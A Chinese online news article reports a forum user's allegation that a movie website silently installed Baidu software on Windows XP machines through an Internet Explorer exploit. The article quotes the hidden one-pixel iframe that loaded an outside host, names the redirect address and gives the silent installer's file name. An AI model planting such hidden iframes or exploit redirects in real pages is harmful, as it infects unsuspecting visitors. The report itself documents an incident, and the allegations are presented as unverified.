天津在线

首页> 科技频道> 互联网> 正文

百度利用IE漏洞推广软件 专家称其病毒行为

“百度杀毒像病毒一样攻击用户系统漏洞,真是连底裤都不要了!”近日,名为“雷帝因陀罗”网友在安全论坛卡饭上爆料,称自己用XP电脑访问百度影音联盟网站时,电脑自动下载运行了百度杀毒、百度卫士、百度浏览器和百度输入法等一系列百度软件。经过分析,发现这是名为“百度有钱联盟”的安装包在利用IE漏洞植入电脑。

据该网友介绍,他在上网看片搜到一个影音站,结果片子半天没有缓冲出来,电脑先卡得要死。没过一会儿,突然发现桌面右下角冒出几个图标,不知怎么就装上了百度杀毒、百度卫士之类的。

该网友检测了下页面的源代码“www.80ydw.com/movie/693.html”,发现居然被挂马了:<iframe src=http://hpa.pw/HHH width=1 height=1></iframe>。经过进一步分析,该页面会跳转到“221.233.160.110/images/xml.html”,原来黑客是利用微软11月刚补的IE漏洞挂马(XP系统直接中招),而且挂的是一个百度官方签名的安装包,下载地址也是在百度服务器!

再观察百度利用IE漏洞偷偷安装的安装包,文件名是BaiduYouQianPartPackSilent_1.1.0.10_150946.exe,大小有144MB!当它利用漏洞自动下载执行后,会给电脑里装上百度杀毒、百度卫士、百度浏览器和百度输入法等一系列软件。

在看到“雷帝因陀罗”在卡饭论坛上的帖子之后,有网友在一台XP电脑上进行了验证,浏览器打开“www.80ydw.com/movie/693.html”这个网页,什么也不干,大约6分钟后,桌面上出现了百度杀毒、百度卫士、百度浏览器、百度输入法四个图标,这4款软件被安装在电脑中。

业内人士指出,漏洞是木马病毒入侵的一个主要通道,黑客利用漏洞在网站挂马,一旦有人访问电脑就会自动下载运行病毒。而百度利用这种方式推广软件牟利,简直是赤裸裸的病毒行为。难怪网友“雷帝因陀罗”怒斥,百度杀毒攻击用户的系统漏洞,真是连底裤都不要了。

有安全专家称,利用漏洞进行攻击入侵,是典型的病毒行为,是安全防护技术予以拦截和阻止的,一个有足够影响的互联网知名公司,用这种病毒行为进行产品推广,有违行业道德。

版权声明

一、凡注明来源为"天津在线"的所有作品文字、图片、音视频、美术设计和程序等作品,版权均属天津在线或相关权利人专属所有或持有所有。

二、未经本网书面授权,不得进行一切形式的下载、转载或建立镜像。否则以侵权论,依法追究相关法律责任。

三、凡本网注明"来源:XXX(非天津在线)"的作品,均转载自其它媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。

四、转载声明:如本网转载作品涉及版权等问题,请在作品于本网发表之日起30日内及时同本网联系,否则视为放弃相关权利。

免责声明:本文仅代表作者个人观点,与天津在线无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。

登载此文只为提供信息参考,并不用于任何商业目的。如有侵权,请及时联系我们删除:jubao@72177.com

今日天津